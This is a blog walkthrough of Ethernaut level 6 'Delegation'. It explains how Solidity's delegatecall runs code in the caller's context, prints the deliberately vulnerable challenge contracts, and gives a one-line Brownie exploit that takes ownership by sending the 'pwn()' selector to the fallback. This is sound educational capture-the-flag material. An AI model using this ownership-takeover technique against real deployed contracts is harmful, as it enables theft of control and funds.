<!DOCTYPE html>
<html lang="en" itemscope itemtype="http://schema.org/WebPage">
<head>
  <meta charset="utf-8" />

  <meta name="viewport" content="width=device-width, initial-scale=1" />

  <link rel="icon" href="/favicon.ico">

  <title>
    Ethernaut - Level 06 - Delegation - Security Pills
  </title>

  <meta name="description" content="Image courtesy of OpenZeppelin
Ethernaut 06 - Delegation This level from Ethernaut, Delegation, is about a special Solidity method called delegatecall(). To complete this level, we must understand how this low level function works, how it can be used to delegate operations to on-chain libraries, and what implications it has on execution scope.
// SPDX-License-Identifier: MIT pragma solidity ^0.6.0; contract Delegate { address public owner; constructor(address _owner) public { owner = _owner; } function pwn() public { owner = msg." /><meta name="generator" content="Hugo 0.103.1" />

  <link rel="stylesheet" href="https://securitypills.github.io/css/main.css" />

  
  

  <meta property="og:title" content="Ethernaut - Level 06 - Delegation" />
<meta property="og:description" content="Image courtesy of OpenZeppelin
Ethernaut 06 - Delegation This level from Ethernaut, Delegation, is about a special Solidity method called delegatecall(). To complete this level, we must understand how this low level function works, how it can be used to delegate operations to on-chain libraries, and what implications it has on execution scope.
// SPDX-License-Identifier: MIT pragma solidity ^0.6.0; contract Delegate { address public owner; constructor(address _owner) public { owner = _owner; } function pwn() public { owner = msg." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://securitypills.github.io/articles/ethernaut-6-delegation/" /><meta property="article:section" content="articles" />
<meta property="article:published_time" content="2022-09-16T00:00:00+00:00" />
<meta property="article:modified_time" content="2022-09-16T00:00:00+00:00" />



  <meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Ethernaut - Level 06 - Delegation"/>
<meta name="twitter:description" content="Image courtesy of OpenZeppelin
Ethernaut 06 - Delegation This level from Ethernaut, Delegation, is about a special Solidity method called delegatecall(). To complete this level, we must understand how this low level function works, how it can be used to delegate operations to on-chain libraries, and what implications it has on execution scope.
// SPDX-License-Identifier: MIT pragma solidity ^0.6.0; contract Delegate { address public owner; constructor(address _owner) public { owner = _owner; } function pwn() public { owner = msg."/>


  <meta itemprop="name" content="Ethernaut - Level 06 - Delegation">
<meta itemprop="description" content="Image courtesy of OpenZeppelin
Ethernaut 06 - Delegation This level from Ethernaut, Delegation, is about a special Solidity method called delegatecall(). To complete this level, we must understand how this low level function works, how it can be used to delegate operations to on-chain libraries, and what implications it has on execution scope.
// SPDX-License-Identifier: MIT pragma solidity ^0.6.0; contract Delegate { address public owner; constructor(address _owner) public { owner = _owner; } function pwn() public { owner = msg."><meta itemprop="datePublished" content="2022-09-16T00:00:00+00:00" />
<meta itemprop="dateModified" content="2022-09-16T00:00:00+00:00" />
<meta itemprop="wordCount" content="1083">
<meta itemprop="keywords" content="" />

  <meta itemprop="name" content="Ethernaut - Level 06 - Delegation">
<meta itemprop="description" content="Image courtesy of OpenZeppelin
Ethernaut 06 - Delegation This level from Ethernaut, Delegation, is about a special Solidity method called delegatecall(). To complete this level, we must understand how this low level function works, how it can be used to delegate operations to on-chain libraries, and what implications it has on execution scope.
// SPDX-License-Identifier: MIT pragma solidity ^0.6.0; contract Delegate { address public owner; constructor(address _owner) public { owner = _owner; } function pwn() public { owner = msg."><meta itemprop="datePublished" content="2022-09-16T00:00:00+00:00" />
<meta itemprop="dateModified" content="2022-09-16T00:00:00+00:00" />
<meta itemprop="wordCount" content="1083">
<meta itemprop="keywords" content="" />
</head><body class="flex relative h-full min-h-screen"><aside
  class="will-change-transform transform transition-transform -translate-x-full absolute top-0 left-0 md:relative md:translate-x-0 w-3/4 md:w-60 h-full min-h-screen p-3 bg-slate-50 dark:bg-slate-800 border-r border-slate-200 dark:border-slate-700 flex flex-col gap-2.5 z-20 sidebar">
  <p class="font-bold mb-5 flex items-center gap-2">
    <button
      aria-label="Close sidebar"
      class="md:hidden menu-trigger-close p-1 rounded text-slate-800 dark:text-slate-50 hover:bg-slate-200 dark:hover:bg-slate-700"><svg class="h-6 w-6" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor"
  fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z" />
  <line x1="18" y1="6" x2="6" y2="18" />
  <line x1="6" y1="6" x2="18" y2="18" />
</svg></button>
    <a href="https://securitypills.github.io/" class="px-2">
    <span>Security Pills</span>
    
    </a>
    
    <button
      aria-label="Toggle dark mode"
      class="dark-mode-toggle p-2 rounded border dark:border-slate-700 hover:bg-slate-200 dark:hover:bg-slate-700"><svg class="h-4 w-4" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor"
  fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z" />
  <circle cx="12" cy="12" r="4" />
  <path d="M3 12h1M12 3v1M20 12h1M12 20v1M5.6 5.6l.7 .7M18.4 5.6l-.7 .7M17.7 17.7l.7 .7M6.3 17.7l-.7 .7" />
</svg></button>
  
  </p>

  
  <ul class="list-none flex flex-col gap-1">
    
    <li>
      <a class="px-2 py-1.5 rounded-md text-sm flex items-center justify-between  hover:bg-slate-200 dark:hover:bg-slate-700 "
        href="/" >
        <span>Home</span>
        
      </a>
    </li>
    
    <li>
      <a class="px-2 py-1.5 rounded-md text-sm flex items-center justify-between  hover:bg-slate-200 dark:hover:bg-slate-700 "
        href="/articles" >
        <span>Blog</span>
        
      </a>
    </li>
    
    <li>
      <a class="px-2 py-1.5 rounded-md text-sm flex items-center justify-between  hover:bg-slate-200 dark:hover:bg-slate-700 "
        href="/portfolio" >
        <span>Newsletter</span>
        
      </a>
    </li>
    
  </ul>

  <div class="flex-1"></div>

  <div class="revue-widget">
  <form action="https://embeds.beehiiv.com/3645f86f-e3bb-46cb-adec-b3b2f20c9411?slim=true" method="post" name="revue-form" target="_blank">
    <div class="text-bold text-sm">Subscribe to my newsletter</div>
    
    <p class="text-xs my-1 text-slate-500">A weekly newsletter for smart and curious people interested in security, technology, and smartcontracts</p>
    
    <div class="mt-2">
      <input type="email" class="w-full px-1.5 py-0.5 text-sm rounded border dark:border-slate-700 dark:bg-slate-600" name="member[email]" id="member_email" placeholder="Your email address...">
      <input type="submit" class="mt-2 w-full text-center text-sm bg-slate-800 text-white dark:bg-slate-50 dark:text-slate-800 py-1 rounded" name="member[subscribe]" id="member_submit" value="Subscribe">
    </div>
  </form>
</div>

  <ul class="list-none flex flex-wrap justify-center gap-1 pt-2 border-t border-slate-200 dark:border-slate-600">
    
  </ul>
</aside>

<div
  class="fixed bg-slate-700 bg-opacity-5 transition duration-200 ease-in-out inset-0 z-10 pointer-events-auto md:hidden left-0 top-0 w-full h-full hidden menu-overlay">
</div>

<button
  aria-label="Toggle Sidebar"
  class="md:hidden absolute top-3 left-3 z-10 menu-trigger p-1 rounded text-slate-800 dark:text-slate-50 hover:bg-slate-100"><svg class="h-6 w-6" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor"
  fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z" />
  <line x1="4" y1="6" x2="20" y2="6" />
  <line x1="4" y1="12" x2="20" y2="12" />
  <line x1="4" y1="18" x2="16" y2="18" />
</svg></button><div class="flex-1">



<div class="flex h-screen relative">

  <section
    class="will-change-transform transform transition-transform -translate-x-[200%] absolute top-0 left-0 lg:relative
  lg:translate-x-0 lg:min-w-[400px] lg:w-1/4 h-full bg-slate-50 dark:bg-slate-800 border-r border-slate-200 dark:border-slate-700 lg:flex flex-col py-3 overflow-y-auto scroll-area">
    
    
    <a href="https://securitypills.github.io/articles/">
      <h2 class="font-bold mb-5 py-1 pl-12 pr-3 md:px-3">Articles</h2>
    </a>
    <div class="space-y-2.5">
      
      <a class="block px-3 py-4  bg-slate-900 dark:bg-slate-700 text-slate-50 "
        href="/articles/ethernaut-6-delegation/">
        
        
        <h3 class="text-lg font-semibold mb-0.5">Ethernaut - Level 06 - Delegation</h3>
        <div
          class="text-sm  text-slate-400  line-clamp-2">
          Image courtesy of OpenZeppelin
Ethernaut 06 - Delegation This level from Ethernaut, Delegation, is about a special Solidity method called delegatecall(). To complete this level, we must understand how this low level function works, how it can be used to delegate operations to on-chain libraries, and what implications it has on execution scope.
// SPDX-License-Identifier: MIT pragma solidity ^0.6.0; contract Delegate { address public owner; constructor(address _owner) public { owner = _owner; } function pwn() public { owner = msg.
        </div>
      </a>
      
      <a class="block px-3 py-4  hover:bg-slate-200 dark:hover:bg-slate-700 "
        href="/articles/ethernaut-5-token/">
        
        
        <h3 class="text-lg font-semibold mb-0.5">Ethernaut - Level 05 - Token</h3>
        <div
          class="text-sm  text-slate-500 dark:text-slate-400  line-clamp-2">
          Image courtesy of OpenZeppelin
Ethernaut 05 - Token This level from Ethernaut, called Token, is a good exercise to become familiar with the integer underflow and integer overflow concepts. In this challenge you are given 20 tokens to start with and you will beat the level if you somehow manage to get your hands on any additional tokens. Preferably a very large number of tokens.
// SPDX-License-Identifier: MIT pragma solidity ^0.
        </div>
      </a>
      
      <a class="block px-3 py-4  hover:bg-slate-200 dark:hover:bg-slate-700 "
        href="/articles/ethernaut-4-telephone/">
        
        
        <h3 class="text-lg font-semibold mb-0.5">Ethernaut - Level 04 - Telephone</h3>
        <div
          class="text-sm  text-slate-500 dark:text-slate-400  line-clamp-2">
          Image courtesy of OpenZeppelin
Ethernaut 04 - Telephone This level from Ethernaut, called Telephone, is a good exercise to learn the nuances between tx.origin and msg.sender and why you should never use tx.origin for authentication purposes:
// SPDX-License-Identifier: MIT pragma solidity ^0.6.0; contract Telephone { address public owner; constructor() public { owner = msg.sender; } function changeOwner(address _owner) public { if (tx.origin != msg.sender) { owner = _owner; } } } Solidity has a global variable, tx.
        </div>
      </a>
      
      <a class="block px-3 py-4  hover:bg-slate-200 dark:hover:bg-slate-700 "
        href="/articles/ethernaut-3-coinflip/">
        
        
        <h3 class="text-lg font-semibold mb-0.5">Ethernaut - Level 03 - Coinflip</h3>
        <div
          class="text-sm  text-slate-500 dark:text-slate-400  line-clamp-2">
          Image courtesy of OpenZeppelin
Ethernaut 03 - Coinflip The third level in Ethernaut, CoinFlip, is a good exercise that will teach you how to exploit pseudo randomness implementations in smart contracts. This contract will require you to correctly guess the outcome of a coin flip ten times in a row:
// SPDX-License-Identifier: MIT pragma solidity ^0.6.0; import &#39;@openzeppelin/contracts/math/SafeMath.sol&#39;; contract CoinFlip { using SafeMath for uint256; uint256 public consecutiveWins; uint256 lastHash; uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968; constructor() public { consecutiveWins = 0; } function flip(bool _guess) public returns (bool) { uint256 blockValue = uint256(blockhash(block.
        </div>
      </a>
      
      <a class="block px-3 py-4  hover:bg-slate-200 dark:hover:bg-slate-700 "
        href="/articles/ethernaut/">
        
        
        <h3 class="text-lg font-semibold mb-0.5">Ethernaut Challenges</h3>
        <div
          class="text-sm  text-slate-500 dark:text-slate-400  line-clamp-2">
          Please read This is a work in progress article that will receive updates as we continue publishing detailed walkthroughs for each level.
Ethernaut is OpenZeppelin Web3/Solidity based wargame to learn about Ethereum smart contract security and become familiar with programming principles in Solidity.
Although the game was launched few years ago it has become a good place to start for those who are interested on security and smart contracts.
Challenges are currently running on the Rinkeby testnet and you will require to use a Rinkey Faucet to get free testnet ETH and test the smart contracts.
        </div>
      </a>
      
      <a class="block px-3 py-4  hover:bg-slate-200 dark:hover:bg-slate-700 "
        href="/articles/ethernaut-1-fallback/">
        
        
        <h3 class="text-lg font-semibold mb-0.5">Ethernaut - Level 01 - Fallback</h3>
        <div
          class="text-sm  text-slate-500 dark:text-slate-400  line-clamp-2">
          Image courtesy of OpenZeppelin
Ethernaut 01 - Fallback The first level from Ethernaut is pretty straightforward and we will use it to become familiar with some Solidity concepts and the Brownie framework that we will use to complete this challenge.
The code for the smart contract that we must exploit is shown above:
// SPDX-License-Identifier: MIT pragma solidity ^0.6.0; import &#39;@openzeppelin/contracts/math/SafeMath.sol&#39;; contract Fallback { using SafeMath for uint256; mapping(address =&gt; uint) public contributions; address payable public owner; constructor() public { owner = msg.
        </div>
      </a>
      
      <a class="block px-3 py-4  hover:bg-slate-200 dark:hover:bg-slate-700 "
        href="/articles/ethernaut-2-fallout/">
        
        
        <h3 class="text-lg font-semibold mb-0.5">Ethernaut - Level 02 - Fallout</h3>
        <div
          class="text-sm  text-slate-500 dark:text-slate-400  line-clamp-2">
          Image courtesy of OpenZeppelin
Ethernaut 02 - Fallout The goal for this level is to claim ownership of the contract, which has the following implementation:
// SPDX-License-Identifier: MIT pragma solidity ^0.6.0; import &#39;@openzeppelin/contracts/math/SafeMath.sol&#39;; contract Fallout { using SafeMath for uint256; mapping (address =&gt; uint) allocations; address payable public owner; /* constructor */ function Fal1out() public payable { owner = msg.sender; allocations[owner] = msg.value; } modifier onlyOwner { require( msg.sender == owner, &#34;caller is not the owner&#34; ); _; } function allocate() public payable { allocations[msg.
        </div>
      </a>
      </div>
    </section>

  <div class="overflow-y-auto h-screen w-full">
    <article class="px-6 py-20 w-full mx-auto prose lg:prose-lg h-fit dark:prose-invert prose-img:mx-auto">

      
      <h1 class="!mb-2">Ethernaut - Level 06 - Delegation</h1>
      
      <p class="text-sm text-slate-500 !mb-8">September 16, 2022</p>
      

      

      <figure><img src="../images/delegation-6.svg"
         alt="Image courtesy of OpenZeppelin"/><figcaption>
            <p>Image courtesy of OpenZeppelin</p>
        </figcaption>
</figure>

<h2 id="ethernaut-06---delegation">Ethernaut 06 - Delegation</h2>
<p>This level from Ethernaut, Delegation, is about a special Solidity method called <code>delegatecall()</code>. To complete this level, we must understand how this low level function works, how it can be used to delegate operations to on-chain libraries, and what implications it has on execution scope.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-solidity" data-lang="solidity"><span style="display:flex;"><span><span style="color:#75715e">// SPDX-License-Identifier: MIT
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">pragma solidity</span> <span style="color:#f92672">^</span><span style="color:#ae81ff">0</span>.<span style="color:#ae81ff">6</span>.<span style="color:#ae81ff">0</span>;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">contract</span> <span style="color:#a6e22e">Delegate</span> {
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">address</span> <span style="color:#66d9ef">public</span> owner;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">constructor</span>(<span style="color:#66d9ef">address</span> _owner) <span style="color:#66d9ef">public</span> {
</span></span><span style="display:flex;"><span>    owner <span style="color:#f92672">=</span> _owner;
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">function</span> <span style="color:#a6e22e">pwn</span>() <span style="color:#66d9ef">public</span> {
</span></span><span style="display:flex;"><span>    owner <span style="color:#f92672">=</span> msg.sender;
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">contract</span> <span style="color:#a6e22e">Delegation</span> {
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">address</span> <span style="color:#66d9ef">public</span> owner;
</span></span><span style="display:flex;"><span>  Delegate delegate;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">constructor</span>(<span style="color:#66d9ef">address</span> _delegateAddress) <span style="color:#66d9ef">public</span> {
</span></span><span style="display:flex;"><span>    delegate <span style="color:#f92672">=</span> Delegate(_delegateAddress);
</span></span><span style="display:flex;"><span>    owner <span style="color:#f92672">=</span> msg.sender;
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  fallback() <span style="color:#66d9ef">external</span> {
</span></span><span style="display:flex;"><span>    (<span style="color:#66d9ef">bool</span> result,) <span style="color:#f92672">=</span> <span style="color:#66d9ef">address</span>(delegate).delegatecall(msg.data);
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> (result) {
</span></span><span style="display:flex;"><span>      this;
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Before we deep-dive into the contract&rsquo;s implementation, lets explain some concepts that will make easier for us to understand the vulnerability that needs to be exploited.</p>
<p>Solidity provides different ways to call external contracts from within a given contract:</p>
<ul>
<li><strong>ABI is available</strong>: The contract Application Binary Interface (ABI), is the standard way to interact with contracts in the Ethereum ecosystem, both from outside the blockchain and for contract-to-contract interaction. In this scenario, if the ABI and the contract’s address are known, we can simply instantiate the contract and call its functions.</li>
<li><strong>ABI is not available</strong>: Use <code>delegatecall</code> or <code>call</code> opcodes:  In Ethereum, the transaction’s input data that is generated after making a call can be broken down into two subparts:
<ul>
<li>A method selector: First 4 bytes of a function call’s bytecode. Generated by hashing (kecccak256) the method’s name and the type of  arguments expected.</li>
<li>The remaining input are method arguments in chunks of 32 bytes</li>
</ul>
</li>
</ul>
<p>Contracts can call other contracts or send Ether to non-contract accounts by the means of message calls (<code>call</code>). These calls are like transactions, in that they have a source, a target, data payload, Ether, gas and return data. This means, standard external calls to contracts are handled by the <code>call</code> opcode whereby code is run in the context of the external contract/function (<code>call</code> doesn’t preserve context).</p>
<figure><img src="../images/ethernaut-delegation-06-pic1.png"
         alt="How call works"/><figcaption>
            <p>How <code>call</code> works</p>
        </figcaption>
</figure>

<p>On the contrary, there exists a special variant of a message call, named <code>delegatecall</code> which is identical to a message call (<code>call</code>) apart  from the fact that the code at the target address is executed in the context of the calling contract and <code>msg.sender</code> and <code>msg.value</code> do not change their values.</p>
<figure><img src="../images/ethernaut-delegation-06-pic2.png"
         alt="How delegatecall works"/><figcaption>
            <p>How <code>delegatecall</code> works</p>
        </figcaption>
</figure>

<p>The other concept that is interesting here are State Variables (or <code>storage</code> variables) and how are they stored in contracts. State or <code>storage</code> variables (variables that persist over individual transactions) are placed into <code>slots</code> sequentially as they are introduced in the contract. We do encourage you to read the <a href="https://docs.soliditylang.org/en/v0.8.14/internals/layout_in_storage.html#layout-of-state-variables-in-storage"  target="_blank" rel="noopener" >Layout of State Variables</a> in Storage for a more thorough understanding and the <a href="https://blog.sigmaprime.io/solidity-security.html#delegatecall"  target="_blank" rel="noopener" >Delegatecall example written by SigmaPrime</a>.</p>
<p>The idea on this contract is to understand that we will be running the function <code>pwn()</code> of the <code>Delegate</code> contract as if that code was executed inside our calling contract, with our own data.</p>
<h2 id="where-is-the-vulnerability">Where is the vulnerability?</h2>
<p>The <code>Delegation</code> fallback implements a <code>delegatecall</code>. By sending the right <code>msg.data</code> it is possible to trigger the <code>pwn()</code> function on the Delegate contract and become the contract’s owner. Since this function will be executed by a <code>delegatecall</code>, the context will be preserved.</p>
<p>But let&rsquo;s explain step by step why this contract is vulnerable:</p>
<div class="highlight" lineos="table" lineofstart="1"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;display:grid;"><code class="language-solidity" data-lang="solidity"><span style="display:flex;"><span><span style="color:#75715e">// SPDX-License-Identifier: MIT
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">pragma solidity</span> <span style="color:#f92672">^</span><span style="color:#ae81ff">0</span>.<span style="color:#ae81ff">6</span>.<span style="color:#ae81ff">0</span>;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">contract</span> <span style="color:#a6e22e">Delegate</span> {
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>...omitted <span style="color:#66d9ef">for</span> brevity...
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex; background-color:#3c3d38"><span>  <span style="color:#66d9ef">function</span> <span style="color:#a6e22e">pwn</span>() <span style="color:#66d9ef">public</span> {
</span></span><span style="display:flex; background-color:#3c3d38"><span>    owner <span style="color:#f92672">=</span> msg.sender;
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">contract</span> <span style="color:#a6e22e">Delegation</span> {
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>...omitted <span style="color:#66d9ef">for</span> brevity...
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex; background-color:#3c3d38"><span>  fallback() <span style="color:#66d9ef">external</span> {
</span></span><span style="display:flex; background-color:#3c3d38"><span>    (<span style="color:#66d9ef">bool</span> result,) <span style="color:#f92672">=</span> <span style="color:#66d9ef">address</span>(delegate).delegatecall(msg.data);
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> (result) {
</span></span><span style="display:flex;"><span>      this;
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><ol>
<li>
<p>The <code>fallback</code> function defined in the <code>Delegation</code> contract will get executed once we create an instance of this contract and call a function that does not exist, like <code>pwn()</code>. Remember that <code>pwn()</code> has been defined in the <code>Delegate</code> contract.</p>
</li>
<li>
<p>The <code>delegatecall()</code> from the <code>Delegation</code> contract will execute code from the <code>Delegate</code> contract as if the code in that contract was running in our own contract, preserving, and using our own data contract</p>
</li>
<li>
<p>As we have explained earlier in this post, calls made through <code>delegatecall()</code> will run the code in the context of the calling contract and <code>msg.sender</code>, <code>msg.value</code> and <code>msg.data</code> will be preserved. That will cause that the <code>pwn()</code> method from the <code>Delegate</code> contract gets executed and the variable <code>owner</code> gets updated to our <code>msg.sender</code>.</p>
</li>
</ol>
<h2 id="hacking-the-contract">Hacking the contract</h2>
<p>The most difficult part to exploit this contract is to become familiar with the concepts explained earlier and understand how the <code>delegatecall()</code> method works at low level. If you have mastered these points the exploit can be narrowed to just one line of code (for real).</p>
<p>For this exploit we are going to use the <code>web3.utils.keccak256</code> function to obtain the <code>keccak-256</code> hash on a function that does not exist (<code>pwn()</code>) and that will trigger the behavior explained in the previous section:</p>
<div class="highlight" lineos="table" lineofstart="1"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;display:grid;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#f92672">from</span> brownie <span style="color:#f92672">import</span> accounts, config, web3
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">attack</span>(target, hacker):
</span></span><span style="display:flex; background-color:#3c3d38"><span>    hacker<span style="color:#f92672">.</span>transfer(to<span style="color:#f92672">=</span>target, data<span style="color:#f92672">=</span>web3<span style="color:#f92672">.</span>keccak(text<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;pwn()&#39;</span>))
</span></span><span style="display:flex;"><span>    <span style="color:#75715e">#print(&#34;Test &#34;+ web3.keccak(text=&#39;pwn()&#39;).hex()) // 0xdd365b8b15d5d78ec041b851b68c8b985bee78bee0b87c4acf261024d8beabab</span>
</span></span><span style="display:flex; background-color:#3c3d38"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">main</span>(target):
</span></span><span style="display:flex;"><span>    hacker <span style="color:#f92672">=</span> accounts<span style="color:#f92672">.</span>add(config[<span style="color:#e6db74">&#39;wallets&#39;</span>][<span style="color:#e6db74">&#39;from_key&#39;</span>])
</span></span><span style="display:flex;"><span>    attack(target, hacker)
</span></span></code></pre></div><p>Once we execute our exploit the following events will occur:</p>
<ol>
<li>It will attempt to call the <code>pwn()</code> function on the <code>Delegation</code> contract, which does not exist.</li>
<li>This will trigger the <code>fallback()</code> method in the <code>Delegation</code> contract (remember from previous levels that once you call a function that does not exist, if there is a <code>fallback</code> method implemented in the contract, it will get triggered instead), which will call the <code>pwn()</code> function in the <code>Delegate</code> contract (<code>address(delegate).delegatecall(msg.data);</code>).</li>
<li>The <code>pwn()</code> method from the <code>Delegate</code> contract will run as if it was running in the <code>Delegation</code> contract.</li>
<li>This will set Delegation&rsquo;s owner to the <code>msg.sender</code>, which will be our address, as its original value will be preserved.</li>
</ol>
<h2 id="takeaways">Takeaways</h2>
<p>This was probably one of the Ethernaut challenges that took me more time to solve, probably because I was unfamiliar to delegatecall&rsquo;s internals and didn&rsquo;t know how it works.</p>
<p>There are still scenarios where I can see how useful this method could be, especially if you would like to create a library with its own methods and call them from a different contract, like you would do in other programming languages like C or C++.</p>
<p>However, Solidity has the <code>library</code> keyword for implementing library contracts. This ensures the contract is stateless and non-self-destructive. As a library is an isolated piece of source code, it can only access state variables of the calling contract if they are explicitly supplied. This help to prevent attacks whereby attackers modify the state of the library directly  in order to affect the contracts that depend on the library’s code.</p>

    </article>
  </div>

</div>


  </div>
<script type="text/javascript" src="/main.js" defer></script>


</body>

</html>